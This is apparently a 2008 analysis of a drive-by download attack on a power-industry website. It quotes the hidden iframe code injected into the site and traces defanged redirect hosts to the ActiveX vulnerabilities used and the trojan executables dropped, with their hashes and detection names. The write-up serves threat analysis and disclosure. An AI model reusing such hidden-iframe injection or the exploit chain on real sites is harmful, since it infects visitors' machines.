A power-industry information network site found hosting a drive-by Trojan chain: Worm.Win32.AutoRun, Trojan-Downloader.Win32.Losabel
Endurer (original)
2008-05-28, 1st version
Code injected into the site's web page:
/---
<IFRAME src=hxxp://C**5.*5*I***6.us/c5.htm?8888 width=0 H'>
<IFRAME src="hxxp://125.*64.*92.*56/iisstart.htm" width="100" height="0"></iframe>
---/
#1 hxxp://C**5.*5*I***6.us/c5.htm?8888 contents:
/---
<IFRAME src=hxxp://www.*36**0C*36*0.***.CN/100.htm width=0 height=0></iframe>
---/
#1.1 hxxp://www.*36**0C*36*0.***.CN/100.htm contains the code:
/---
<IFRAME style=display:none src="hxxp://www.*36**0a*36*0.***.CN/W/u.html"></iframe>
---/
#1.1.1 hxxp://www.*36**0a*36*0.***.CN/W/u.html outputs the code:
/---
<SCRIPT src=1.gif></SCRIPT>
<IFRAME width=100 height=0 src=6.gif></iframe>
<IFRAME width=100 height=0 src=5.gif></iframe>
<IFRAME width=100 height=0 src=3.gif></iframe>
<IFRAME width=100 height=0 src=2.gif></iframe>
<IFRAME width=100 height=0 src=7.gif></iframe>
<IFRAME width=100 height=0 src=4.gif></iframe>
---/
#1.1.1.1 hxxp://www.*36**0a*36*0.***.CN/W/1.gif
Uses the MS06-014 vulnerability (the MDAC RDS.DataSpace ActiveX control, CVE-2006-0003) to download hxxp://www.*36**0a*36*0.*.CN/D/614.exe
File: D:/test/614.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created: 18:14:48
Modified: 18:14:49
Accessed: 18:15:15
Size: 15180 bytes (14 KB + 844 bytes)
MD5: f30fd225bfae1c1ef6a349d8fd078a06
SHA1: 09b2f964291b216de0fe69416c43eff00a94b1d9
CRC32: 50053f7c
Kaspersky reports: Worm.Win32.AutoRun.dnv
#1.1.1.2 hxxp://www.*36**0a*36*0.***.CN/W/2.gif
Uses the RealPlayer IERPCtl.IERPCtl.1 ActiveX vulnerability (CVE-2007-5601) to download hxxp://www.*36**0a*36*0.**.CN/D/r11.exe
r11.exe is the same file as 614.exe
#1.1.1.3 hxxp://www.*36**0a*36*0.***.CN/W/3.gif
Uses the Baofeng Storm player (MPS.StormPlayer.1) ActiveX vulnerability to download hxxp://www.*36**0a*36*0.***.CN/D/bf.exe
bf.exe is the same file as 614.exe
#1.1.1.4 hxxp://www.*36**0a*36*0.***.CN/W/4.gif
Uses the PPStream (PowerPlayer.PowerPlayerCtrl.1) ActiveX vulnerability to download hxxp://www.*36**0a*36*0.***.CN/D/pps.exe
pps.exe is the same file as 614.exe
#1.1.1.5 hxxp://www.*36**0a*36*0.***.CN/W/5.gif
Uses the GLChat.GLChatCtrl.1 ActiveX vulnerability (CLSID: 61F5C358-60FB-4A23-A312-D2B556620F20) to download hxxp://www.*36**0a*36*0.***.CN/D/lz.exe
lz.exe is the same file as 614.exe
#1.1.1.6 hxxp://www.*36**0a*36*0.***.CN/W/6.gif
Uses the Thunder (Xunlei) DPClient.Vod ActiveX vulnerability (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) to download hxxp://www.*36**0a*36*0.***.CN/D/xl.exe
xl.exe is the same file as 614.exe
#1.1.1.7 hxxp://www.*36**0a*36*0.***.CN/W/7.gif
Uses the RealPlayer IERPCtl.IERPCtl.1 ActiveX vulnerability (CLSID: 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93) to download hxxp://www.*36**0a*36*0.***.CN/D/r11.exe
r11.exe is the same file as 614.exe
#1.1.1.8 Uses the BaiduBar.Tool ActiveX control (Baidu toolbar) to download hxxp://www.*36**0a*36*0.***.CN/D/ad.cab, which contains ad.exe, the same file as 614.exe
#2 hxxp://125.*64.*92.*56/iisstart.htm contains the code:
/---
<IFRAME src="hxxp://D***.So***R***ryl*.Biz/XX/am1.htm?12-8888" width="100" height="0"></iframe>
---/
#2.1 hxxp://D***.So***R***ryl*.Biz/XX/am1.htm?12-8888 includes/outputs the code:
/---
<IFRAME src="hxxp://D***.So***R***ryl*.Biz/ax14.htm" width=100 height=0></iframe>
<IFRAME src="hxxp://D***.So***R***ryl*.Biz/re10.htm" width=100 height=0></iframe>
<IFRAME src="hxxp://www.To**ngji**12**3.org/axfs.htm" width=100 height=0></iframe>
<IFRAME style=display:none src="hxxp://D***.So***R***ryl*.Biz/axlz.htm"></iframe>
<IFRAME style=display:none src="hxxp://D***.So***R***ryl*.Biz/re11.htm"></iframe>
---/
#2.1.1 hxxp://D***.So***R***ryl*.Biz/ax14.htm
Uses the MS06-014 vulnerability (the MDAC RDS.DataSpace ActiveX control, CVE-2006-0003) to download hxxp://www.To**ngji**12**3.org/soc.exe
File: D:/test/soc.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created: 18:14:50
Modified: 18:14:53
Accessed: 18:15:15
Size: 22336 bytes (21 KB + 832 bytes)
MD5: d06728a40f94710ad45415cc43f58d0d
SHA1: 3366fb9041b8186bf0381711b1bc3aaeabfd609a
CRC32: e7d1a119
Kaspersky reports: Trojan-Downloader.Win32.Losabel.nx
#2.1.2 hxxp://D***.So***R***ryl*.Biz/re10.htm
Uses the RealPlayer IERPCtl.IERPCtl.1 ActiveX vulnerability to download hxxp://www.To**ngji**12**3.org/soc.exe
#2.1.3 hxxp://www.To**ngji**12**3.org/axfs.htm
/---
File does not exist
---/
#2.1.4 hxxp://D***.So***R***ryl*.Biz/axlz.htm
Uses the GLIEDown.IEDown.1 ActiveX vulnerability (CLSID: F917534D-535B-416B-8E8F-0C04756C31A8) to download hxxp://www.To**ngji**12**3.org/soc.exe
#2.1.5 hxxp://D***.So***R***ryl*.Biz/re11.htm
Uses the RealPlayer IERPCtl.IERPCtl.1 ActiveX vulnerability (CLSID: 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93) to download hxxp://www.To**ngji**12**3.org/soc.exe